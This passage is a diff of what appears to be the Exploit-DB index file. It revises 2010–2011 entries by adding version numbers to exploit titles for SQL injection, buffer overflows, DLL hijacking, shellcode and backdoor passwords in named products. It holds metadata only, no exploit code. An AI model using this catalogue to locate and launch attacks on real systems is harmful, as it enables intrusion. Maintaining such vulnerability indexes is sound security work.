Fadzil Ramli",windows,remote,0 @@ -12678,7 +12678,7 @@ id,file,description,date,author,platform,type,port 14463,platforms/php/webapps/14463.txt,"Joomla ITArmory Component (com_itarmory) SQL Injection Vulnerability",2010-07-24,Craw,php,webapps,0 14464,platforms/windows/local/14464.pl,"Mediacoder 0.7.3.4682 - (.m3u) File Universal Buffer Overflow Exploit",2010-07-24,s-dz,windows,local,0 14465,platforms/php/webapps/14465.txt,"sNews 1.7 - (index.php?category) SQL Injection Vulnerability",2010-07-24,CoBRa_21,php,webapps,0 -14466,platforms/php/webapps/14466.txt,"Joomla Component (com_joomdle) SQL Injection Vulnerability",2010-07-24,kaMtiEz,php,webapps,0 +14466,platforms/php/webapps/14466.txt,"Joomla Component (com_joomdle) 0.24 - SQL Injection Vulnerability",2010-07-24,kaMtiEz,php,webapps,0 14467,platforms/php/webapps/14467.txt,"Joomla Component (com_youtube) SQL Injection Vulnerability",2010-07-24,Forza-Dz,php,webapps,0 14469,platforms/php/webapps/14469.txt,"XAOS CMS SQL Injection Vulnerability",2010-07-25,H-SK33PY,php,webapps,0 14470,platforms/php/webapps/14470.txt,"Ballettin Forum SQL Injection Vulnerability",2010-07-25,3v0,php,webapps,0 @@ -12722,7 +12722,7 @@ id,file,description,date,author,platform,type,port 14527,platforms/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Buffer Overflow Exploit",2010-08-02,s-dz,windows,local,0 14528,platforms/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM modules.php SQL Injection Vulnerability",2010-08-02,secret,php,webapps,0 14530,platforms/php/webapps/14530.txt,"Joomla CamelcityDB 2.2 - SQL Injection Vulnerability",2010-08-02,Amine_92,php,webapps,0 -14531,platforms/php/webapps/14531.pdf,"Cybsec Advisory Multiple Cross-Site Scripting (XSS) in MyIT CRM",2010-08-02,"Juan Manuel Garcia",php,webapps,0 +14531,platforms/php/webapps/14531.pdf,"MyIT CRM - Multiple Cross-Site Scripting (XSS)",2010-08-02,"Juan Manuel Garcia",php,webapps,0 14532,platforms/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",windows,local,0 14533,platforms/windows/dos/14533.txt,"Avast! Internet Security 5.0 aswFW.sys kernel driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos,0 14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Include Vulnerability",2010-08-03,eidelweiss,php,webapps,0 @@ -12730,7 +12730,7 @@ id,file,description,date,author,platform,type,port 14537,platforms/multiple/dos/14537.txt,"Oracle MySQL 'ALTER DATABASE' Remote Denial of Service Vulnerability",2010-08-03,"Shane Bester",multiple,dos,0 14538,platforms/hardware/local/14538.txt,"Apple iOS pdf Jailbreak Exploit",2010-08-03,jailbreakme,hardware,local,0 14539,platforms/windows/remote/14539.html,"FathFTP 1.8 (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0 -14541,platforms/php/webapps/14541.txt,"WordPress NextGEN Smooth Gallery Blind SQL Injection Vulnerability",2010-08-03,kaMtiEz,php,webapps,0 +14541,platforms/php/webapps/14541.txt,"WordPress NextGEN Smooth Gallery 0.12 - Blind SQL Injection Vulnerability",2010-08-03,kaMtiEz,php,webapps,0 14545,platforms/windows/dos/14545.txt,"Progitek Visionner Photos 2.0 - File Format DoS",2010-08-03,antrhacks,windows,dos,0 14547,platforms/windows/remote/14547.txt,"HP OpenView NNM 7.53 OvJavaLocale - Buffer Overflow Vulnerability",2010-08-03,"Nahuel Riva",windows,remote,0 14550,platforms/windows/local/14550.py,"Exploit Easy RM to MP3 2.7.3.700 (.m3u , .pls , .smi , .wpl , .wax , .wvx , .ram)",2010-08-04,"Oh Yaw Theng",windows,local,0 @@ -12750,7 +12750,7 @@ id,file,description,date,author,platform,type,port 14566,platforms/windows/local/14566.c,"Microsoft Windows win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow",2010-08-06,Arkon,windows,local,0 14569,platforms/php/webapps/14569.txt,"joomla component cgtestimonial 2.2 - Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps,0 14570,platforms/php/webapps/14570.txt,"Joomla Component com_neorecruit 1.4 - SQL Injection Vulnerability",2010-08-07,v3n0m,php,webapps,0 -14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script SQL Injection Vulnerability",2010-08-07,Silic0n,php,webapps,0 +14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection Vulnerability",2010-08-07,Silic0n,php,webapps,0 14573,platforms/linux/dos/14573.txt,"LibTIFF 'td_stripbytecount' NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-08-07,"Tomas Hoger",linux,dos,0 14576,platforms/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",windows,local,0 14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - statistics.php SQL Injection Exploit",2010-08-08,garwga,php,webapps,0 @@ -12844,7 +12844,7 @@ id,file,description,date,author,platform,type,port 14691,platforms/lin_x86/shellcode/14691.c,"Linux x86 /bin/sh Null-Free Polymorphic Shellcode - 46 bytes",2010-08-19,Aodrulez,lin_x86,shellcode,0 14693,platforms/windows/local/14693.py,"MS Word Record Parsing Buffer Overflow (MS09-027)",2010-08-20,anonymous,windows,local,0 14694,platforms/php/webapps/14694.txt,"Joomla Component com_extcalendar Blind SQL Injection Vulnerability",2010-08-20,Lagripe-Dz,php,webapps,0 -14695,platforms/windows/dos/14695.pl,"Karaoke Video Creator Denial of Service Vulnerability",2010-08-20,PASSEWORD,windows,dos,0 +14695,platforms/windows/dos/14695.pl,"Karaoke Video Creator 2.2.8 - Denial of Service Vulnerability",2010-08-20,PASSEWORD,windows,dos,0 14697,platforms/windows/shellcode/14697.c,"Windows XP SP3 English MessageBoxA Shellcode - 87 bytes",2010-08-20,"Glafkos Charalambous ",windows,shellcode,0 14698,platforms/windows/dos/14698.py,"AV Music Morpher Gold 5.0.38 (.m3u) Denial of Service Vulnerability",2010-08-20,b0telh0,windows,dos,0 14699,platforms/windows/dos/14699.py,"PlayPad Music Player 1.12 - (.mp3) Denial of Service Vulnerability",2010-08-20,"Praveen Darshanam",windows,dos,0 @@ -12894,7 +12894,7 @@ id,file,description,date,author,platform,type,port 14755,platforms/windows/local/14755.c,"Adobe Device Central CS5 DLL Hijacking Exploit (qtcf.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0 14758,platforms/windows/local/14758.c,"Microsoft Group Convertor DLL Hijacking Exploit (imm.dll)",2010-08-25,"Beenu Arora",windows,local,0 -14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader All Version - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0 +14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader All Version <9.x - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0 14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll)",2010-08-25,anonymous,windows,local,0 14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 14765,platforms/windows/local/14765.c,"Mediaplayer Classic 1.3.2189.0 DLL Hijacking Exploit (iacenc.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 @@ -12941,7 +12941,7 @@ id,file,description,date,author,platform,type,port 14822,platforms/php/webapps/14822.txt,"DiY-CMS 1.0 - Multiple Remote File Inclusion Vulnerabilities",2010-08-28,LoSt.HaCkEr,php,webapps,0 14823,platforms/php/webapps/14823.txt,"textpattern cms 4.2.0 - Remote File Inclusion Vulnerability",2010-08-28,Sn!pEr.S!Te,php,webapps,0 14824,platforms/windows/dos/14824.txt,"Leadtools ActiveX Raster Twain 16.5 - (LtocxTwainu.dll) Buffer Overflow Vulnerability",2010-08-28,LiquidWorm,windows,dos,0 -14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP SQL Injection Vulnerability",2010-08-28,Valentin,php,webapps,0 +14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP 1.0 - SQL Injection Vulnerability",2010-08-28,Valentin,php,webapps,0 14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - (profile.php) SQL Injection Exploit",2010-08-28,"Ptrace Security",php,webapps,0 14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 (article.php) SQL Injection Vulnerability",2010-08-28,[]0iZy5,php,webapps,0 14829,platforms/php/webapps/14829.txt,"CF Image Hosting Script 1.3 (settings.cdb) Information Disclosure Vulnerability",2010-08-28,Dr.$audi,php,webapps,0 @@ -12974,7 +12974,7 @@ id,file,description,date,author,platform,type,port 14869,platforms/windows/dos/14869.py,"MOAUB #2 - Apple QuickTime FlashPix NumberOfTiles Remote Code Execution Vulnerability",2010-09-02,Abysssec,windows,dos,0 14870,platforms/asp/webapps/14870.txt,"moaub #2 - rainbowportal Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0 14873,platforms/win32/shellcode/14873.asm,"Shellcode Checksum Routine",2010-09-02,dijital1,win32,shellcode,0 -14875,platforms/multiple/remote/14875.txt,"Backdoor password in Accton-based switches (3com, Dell, SMC, Foundry and EdgeCore)",2010-09-02,"Edwin Eefting",multiple,remote,0 +14875,platforms/multiple/remote/14875.txt,"Accton-based switches (3com, Dell, SMC, Foundry and EdgeCore) - Backdoor Password",2010-09-02,"Edwin Eefting",multiple,remote,0 14876,platforms/php/webapps/14876.txt,"Shop a la Cart Multiple Vulnerabilities",2010-09-02,Ariko-Security,php,webapps,0 14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 ActiveX extSetOwner Remote Code Execution",2010-09-03,Abysssec,windows,remote,0 14879,platforms/asp/webapps/14879.txt,"moaub #3 - visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0 @@ -13113,7 +13113,7 @@ id,file,description,date,author,platform,type,port 15078,platforms/asp/webapps/15078.txt,"MOAUB #22 - gausCMS Multiple Vulnerabilities",2010-09-22,Abysssec,asp,webapps,0 15080,platforms/php/webapps/15080.txt,"Skybluecanvas 1.1-r248 - Cross Site Request Forgery Vulnirability",2010-09-22,Sweet,php,webapps,0 15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - SEH exploit (MSF)",2010-09-22,Madjix,windows,local,0 -15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin Login Bypass Vulnerability",2010-09-22,K-159,php,webapps,0 +15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4 & 2.0 - Login Bypass Vulnerability",2010-09-22,K-159,php,webapps,0 15084,platforms/php/webapps/15084.txt,"Joomla TimeTrack Component 1.2.4 - Component Multiple SQL Injection Vulnerabilities",2010-09-22,"Salvatore Fresta",php,webapps,0 15085,platforms/php/webapps/15085.txt,"Joomla Component (com_ezautos) SQL Injection Vulnerability",2010-09-22,Gamoscu,php,webapps,0 15086,platforms/multiple/dos/15086.py,"MOAUB #23 - Adobe Acrobat Reader and Flash 'newfunction' Remote Code Execution Vulnerability",2010-09-23,Abysssec,multiple,dos,0 @@ -13243,7 +13243,7 @@ id,file,description,date,author,platform,type,port 15260,platforms/windows/dos/15260.txt,"Rocket Software UniData <= 7.2.7.3806 Denial of Service Vulnerabilities",2010-10-15,"Luigi Auriemma",windows,dos,0 15261,platforms/multiple/dos/15261.txt,"IBM solidDB <= 6.5.0.3 - Denial of Service Vulnerability",2010-10-15,"Luigi Auriemma",multiple,dos,0 15262,platforms/windows/dos/15262.txt,"Microsoft Office HtmlDlgHelper Class Memory Corruption",2010-10-16,"Core Security",windows,dos,0 -15263,platforms/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer Denial of Service Vulnerability",2010-10-16,"MOHAMED ABDI",windows,dos,0 +15263,platforms/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service Vulnerability",2010-10-16,"MOHAMED ABDI",windows,dos,0 15264,platforms/aix/dos/15264.py,"PHP Hosting Directory 2.0 Database Disclosure Exploit (.py)",2010-10-16,ZoRLu,aix,dos,0 15265,platforms/asp/remote/15265.rb,"MS10-070 ASP.NET Padding Oracle File Download",2010-10-17,"Agustin Azubel",asp,remote,0 15266,platforms/windows/remote/15266.txt,"Windows NTLM Weak Nonce Vulnerability",2010-10-17,"Hernan Ochoa",windows,remote,0 @@ -13257,8 +13257,8 @@ id,file,description,date,author,platform,type,port 15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-10-18,"Kubanezi AHG",php,webapps,0 15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 - SQL Injection Vulnerability",2010-10-18,X_AviaTique_X,php,webapps,0 15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b - (.wav) Buffer Overflow Vulnerability (SEH)",2010-10-18,"James Fitts",windows,local,0 -15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0 -15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0 +15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0 +15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0 15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 .ogg Denial of Service Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0 15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection Vulnerability",2010-10-19,"Salvatore Fresta",php,webapps,0 15285,platforms/linux/local/15285.c,"Linux RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0 @@ -13358,7 +13358,7 @@ id,file,description,date,author,platform,type,port 15400,platforms/php/webapps/15400.txt,"Dolphin 7.0.3 - Multiple Vulnerabilities",2010-11-02,anT!-Tr0J4n,php,webapps,0 15403,platforms/windows/local/15403.py,"Minishare 1.5.5 - Buffer Overflow Vulnerability (users.txt)",2010-11-02,"Chris Gabriel",windows,local,0 15404,platforms/php/webapps/15404.txt,"eLouai's Force Download Script Arbitrary Local File Download Vulnerability",2010-11-03,v1R00Z,php,webapps,0 -15405,platforms/php/webapps/15405.txt,"digiSHOP SQL Injection Vulnerability",2010-11-03,Silic0n,php,webapps,0 +15405,platforms/php/webapps/15405.txt,"digiSHOP 2.0.2 - SQL Injection Vulnerability",2010-11-03,Silic0n,php,webapps,0 15406,platforms/windows/local/15406.rb,"Minishare 1.5.5 - Buffer Overflow Vulnerability (SEH)",2010-11-03,"Muhamad Fadzil Ramli",windows,local,0 15407,platforms/windows/dos/15407.txt,"Avira Premium Security Suite NtCreateKey Race Condition Vulnerability",2010-11-03,"Nikita Tarakanov",windows,dos,0 15408,platforms/windows/dos/15408.html,"Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service Vulnerability",2010-11-03,"Matthew Bergin",windows,dos,0 @@ -13614,7 +13614,7 @@ id,file,description,date,author,platform,type,port 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0 15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 15705,platforms/linux/dos/15705.txt,"GNU inetutils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,linux,dos,0 -15706,platforms/windows/local/15706.txt,"Winamp 5.6 Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0 +15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0 15707,platforms/multiple/dos/15707.txt,"Wonderware InBatch <= 9.0sp1 Buffer Overflow Vulnerability",2010-12-08,"Luigi Auriemma",multiple,dos,0 15708,platforms/windows/dos/15708.html,"Internet Explorer 8 CSS Parser Denial of Service",2010-12-08,WooYun,windows,dos,0 15710,platforms/multiple/webapps/15710.txt,"Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability",2010-12-09,"Anatolia Security",multiple,webapps,0 @@ -13631,7 +13631,7 @@ id,file,description,date,author,platform,type,port 15723,platforms/freebsd/remote/15723.c,"FreeBSD LiteSpeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0 15725,platforms/linux/remote/15725.pl,"Exim 4.63 Remote Root Exploit",2010-12-11,kingcope,linux,remote,0 15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 .m3u Buffer Overflow",2010-12-11,zota,windows,local,0 -15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot CSRF Vulnerabilities",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0 +15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - CSRF Vulnerabilities",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0 15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 - Buffer Overflow 0day",2010-12-12,m_101,windows,local,0 15730,platforms/windows/local/15730.rb,"SnackAmp 3.1.3 - SMP Buffer Overflow Vulnerability (SEH)",2010-12-12,"James Fitts",windows,local,0 15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 @@ -13733,8 +13733,8 @@ id,file,description,date,author,platform,type,port 15838,platforms/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 Chained: Captcha Bypass->SQLi->Persistent XSS on Frontpage",2010-12-28,"Michael Brooks",php,webapps,0 15839,platforms/windows/dos/15839.php,"Microsoft Windows Fax Services Cover Page Editor (.cov) Memory Corruption",2010-12-28,rgod,windows,dos,0 15840,platforms/php/webapps/15840.txt,"ardeaCore 2.25 - PHP Framework Remote File Inclusion",2010-12-29,n0n0x,php,webapps,0 -15842,platforms/hardware/remote/15842.txt,"DD-WRT Information Disclosure Vulnerability",2010-12-29,"Craig Heffner",hardware,remote,0 -15843,platforms/php/webapps/15843.txt,"News Script PHP Pro (fckeditor) File Upload Vulnerability",2010-12-29,Net.Edit0r,php,webapps,0 +15842,platforms/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure Vulnerability",2010-12-29,"Craig Heffner",hardware,remote,0 +15843,platforms/php/webapps/15843.txt,"News Script PHP Pro - (fckeditor) File Upload Vulnerability",2010-12-29,Net.Edit0r,php,webapps,0 15845,platforms/windows/dos/15845.py,"IrfanView 4.27 - JP2000.dll plugin DoS",2010-12-29,BraniX,windows,dos,0 15846,platforms/php/webapps/15846.txt,"kaibb 1.0.1 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 15847,platforms/php/webapps/15847.txt,"DzTube SQL Injection Vulnerability",2010-12-29,"errnick qwe",php,webapps,0 @@ -13957,7 +13957,7 @@ id,file,description,date,author,platform,type,port 16152,platforms/multiple/webapps/16152.py,"LocatePC 1.05 (Ligatt Version + Others) - Trivial SQL Injection",2011-02-10,anonymous,multiple,webapps,0 16153,platforms/windows/local/16153.py,"MoviePlay 4.82 - (.lst) Buffer Overflow",2011-02-11,sickness,windows,local,0 16154,platforms/php/webapps/16154.txt,"Horde Horde_Image::factory driver Argument Local File Inclusion",2011-02-11,skysbsb,php,webapps,0 -16155,platforms/php/webapps/16155.txt,"Geomi CMS SQL Injection Vulnerability",2011-02-11,"ThunDEr HeaD",php,webapps,0 +16155,platforms/php/webapps/16155.txt,"Geomi CMS 1.2 & 3.0 - SQL Injection Vulnerability",2011-02-11,"ThunDEr HeaD",php,webapps,0 16156,platforms/php/webapps/16156.txt,"Kunena < 1.5.13, < 1.6.3 - SQL Injection Vulnerability",2011-02-11,"Red Matter",php,webapps,0 16157,platforms/jsp/webapps/16157.py,"Openedit <= 5.1294 - Remote Code Execution Exploit",2011-02-11,mr_me,jsp,webapps,0 16158,platforms/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps,0 @@ -13974,8 +13974,8 @@ id,file,description,date,author,platform,type,port 16172,platforms/php/webapps/16172.txt,"omegabill 1.0 build 6 - Multiple Vulnerabilities",2011-02-15,"AutoSec Tools",php,webapps,0 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow Exploit (SEH)",2011-02-15,badc0re,windows,local,0 16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 -16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) Remote Buffer Overflow Exploit",2011-02-16,chap0,windows,remote,0 -16177,platforms/windows/remote/16177.py,"ActFax Server FTP Remote BOF (post auth)",2011-02-16,chap0,windows,remote,0 +16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25, Build 0221 (2010-02-11) - Remote Buffer Overflow Exploit",2011-02-16,chap0,windows,remote,0 +16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25, Build 0221 (2010-02-11) - Remote BOF (Post Auth)",2011-02-16,chap0,windows,remote,0 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent SQL Injection Vulnerability",2011-02-16,R4dc0re,asp,webapps,0 16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent SQL Injection Vulnerability",2011-02-16,R4dc0re,asp,webapps,0 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - (.csv) Denial of Service Vulnerability",2011-02-17,b0telh0,windows,dos,0 @@ -13985,7 +13985,7 @@ id,file,description,date,author,platform,type,port 16190,platforms/windows/dos/16190.pl,"IBM Lotus Domino LDAP Bind Request Remote Code Execution Vulnerability",2011-02-18,"Francis Provencher",windows,dos,0 16191,platforms/windows/dos/16191.pl,"Novell ZenWorks 10 & 11 TFTPD Remote Code Execution Vulnerability",2011-02-18,"Francis Provencher",windows,dos,0 16192,platforms/linux/dos/16192.pl,"Novell Iprint LPD Remote Code Execution Vulnerability",2011-02-18,"Francis Provencher",linux,dos,0 -16193,platforms/windows/dos/16193.pl,"Avira AntiVir QUA file in (avcenter.exe) Local Crash PoC",2011-02-19,KedAns-Dz,windows,dos,0 +16193,platforms/windows/dos/16193.pl,"Avira AntiVir QUA file - (avcenter.exe) Local Crash PoC",2011-02-19,KedAns-Dz,windows,dos,0 16196,platforms/php/webapps/16196.txt,"eventum issue tracking system 2.3.1 - Stored XSS",2011-02-19,"Saif El-Sherei",php,webapps,0 16197,platforms/php/webapps/16197.txt,"Escort Directory CMS SQL Injection Vunerability",2011-02-19,NoNameMT,php,webapps,0 16198,platforms/php/webapps/16198.txt,"Independent Escort CMS Blind SQL Injection Vunerability",2011-02-19,NoNameMT,php,webapps,0 @@ -14039,7 +14039,7 @@ id,file,description,date,author,platform,type,port 16252,platforms/hardware/webapps/16252.html,"Linksys Cisco WAG120N CSRF Vulnerability",2011-02-26,IRCRASH,hardware,webapps,0 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0 16254,platforms/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 Heap Memory Corruption PoC",2011-02-28,LiquidWorm,windows,dos,0 -16255,platforms/windows/dos/16255.pl,"Magic Music Editor .cda Denial of Service",2011-02-28,"AtT4CKxT3rR0r1ST ",windows,dos,0 +16255,platforms/windows/dos/16255.pl,"Magic Music Editor - .cda Denial of Service",2011-02-28,"AtT4CKxT3rR0r1ST ",windows,dos,0 16256,platforms/php/webapps/16256.txt,"DO-CMS Multiple SQL Injection Vulnerabilities",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0 16257,platforms/php/webapps/16257.txt,"SnapProof (page.php) SQL Injection Vulnerability",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0 16259,platforms/windows/remote/16259.txt,"home ftp server 1.12 - Directory Traversal",2011-02-28,clshack,windows,remote,0 @@ -14681,7 +14681,7 @@ id,file,description,date,author,platform,type,port 16901,platforms/php/webapps/16901.rb,"PAJAX Remote Command Execution",2010-04-30,metasploit,php,webapps,0 16902,platforms/php/webapps/16902.rb,"CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit",2011-01-14,metasploit,php,webapps,0 16903,platforms/php/remote/16903.rb,"OpenX banner-edit.php File Upload PHP Code Execution",2010-09-20,metasploit,php,remote,0 -16904,platforms/php/webapps/16904.rb,"Trixbox langChoice PHP Local File Inclusion",2011-01-08,metasploit,php,webapps,0 +16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion",2011-01-08,metasploit,php,webapps,0 16905,platforms/cgi/webapps/16905.rb,"AWStats (6.1-6.2) configdir Remote Command Execution",2009-12-26,metasploit,cgi,webapps,0 16906,platforms/php/webapps/16906.rb,"Joomla 1.5.12 TinyBrowser File Upload Code Execution",2010-06-15,metasploit,php,webapps,0 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet Command Execution",2010-07-01,metasploit,hardware,webapps,0 @@ -14778,7 +14778,7 @@ id,file,description,date,author,platform,type,port 17004,platforms/linux/dos/17004.txt,"libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)",2011-03-18,"Maksymilian Arciemowicz",linux,dos,0 17005,platforms/php/webapps/17005.txt,"Kleophatra 0.1.4 0day Arbitrary Upload File Vulnerability",2011-03-19,Xr0b0t,php,webapps,0 17006,platforms/php/webapps/17006.txt,"balitbang cms 3.3 - Multiple Vulnerabilities",2011-03-19,Xr0b0t,php,webapps,0 -17007,platforms/php/webapps/17007.txt,"Phpbuddies Arbitrary Upload File Vulnerability",2011-03-19,Xr0b0t,php,webapps,0 +17007,platforms/php/webapps/17007.txt,"Phpbuddies - Arbitrary Upload File Vulnerability",2011-03-19,Xr0b0t,php,webapps,0 17009,platforms/php/webapps/17009.txt,"CMS Balitbang 3.3 Arbitary File Upload Vulnerability",2011-03-19,eidelweiss,php,webapps,0 17011,platforms/asp/webapps/17011.txt,"Douran 3.9.7.8 File Download/Source Code Disclosure Vulnerability",2011-03-20,"AJAX Security Team",asp,webapps,0 17012,platforms/windows/local/17012.py,"Mediacoder 2011 RC3 m3u Buffer Overflow Exploit",2011-03-20,"Oh Yaw Theng",windows,local,0 @@ -14992,7 +14992,7 @@ id,file,description,date,author,platform,type,port 17264,platforms/php/webapps/17264.txt,"Joomla Component com_versioning SQLi Vulnerability",2011-05-09,the_cyber_nuxbie,php,webapps,0 17265,platforms/php/webapps/17265.txt,"Joomla Component com_hello SQL Injection Vulnerability",2011-05-09,the_cyber_nuxbie,php,webapps,0 17266,platforms/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0 -17267,platforms/php/webapps/17267.txt,"Traidnt UP (view.php) SQL Injection Vulnerability",2011-05-10,ScOrPiOn,php,webapps,0 +17267,platforms/php/webapps/17267.txt,"Traidnt UP 2.0 - (view.php) SQL Injection Vulnerability",2011-05-10,ScOrPiOn,php,webapps,0 17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 Content-Type Buffer Overflow",2011-05-11,metasploit,windows,remote,0 17269,platforms/windows/remote/17269.rb,"ICONICS WebHMI ActiveX Buffer Overflow",2011-05-10,metasploit,windows,remote,0 17270,platforms/windows/local/17270.pl,"Chasys Media Player 2.0 - Buffer Overflow Exploit(SEH)",2011-05-11,h1ch4m,windows,local,0 @@ -15003,15 +15003,15 @@ id,file,description,date,author,platform,type,port 17277,platforms/windows/local/17277.pl,"A-PDF Wav to MP3 Converter 1.2.0 - DEP Bypass",2011-05-13,h1ch4m,windows,local,0 17278,platforms/windows/dos/17278.pl,"Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC",2011-05-13,LiquidWorm,windows,dos,0 17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download Vulnerability",2011-05-13,LiquidWorm,hardware,remote,0 -17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress plugin (FCKeditor) Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0 +17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin (FCKeditor) 2.5 - Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0 17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability",2011-05-14,"Number 7",php,webapps,0 17287,platforms/windows/dos/17287.mid,"Winamp 5.61 'in_midi' component heap overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0 -17288,platforms/php/webapps/17288.txt,"Joomla Component com_question SQL Injection Vulnerability",2011-05-15,"NeX HaCkEr",php,webapps,0 +17288,platforms/php/webapps/17288.txt,"Joomla Component com_question - SQL Injection Vulnerability",2011-05-15,"NeX HaCkEr",php,webapps,0 17289,platforms/php/webapps/17289.txt,"frame-oshop SQL Injection Vulnerability",2011-05-15,-SmoG-,php,webapps,0 -17290,platforms/hardware/remote/17290.txt,"XtreamerPRO Media-player Multiple 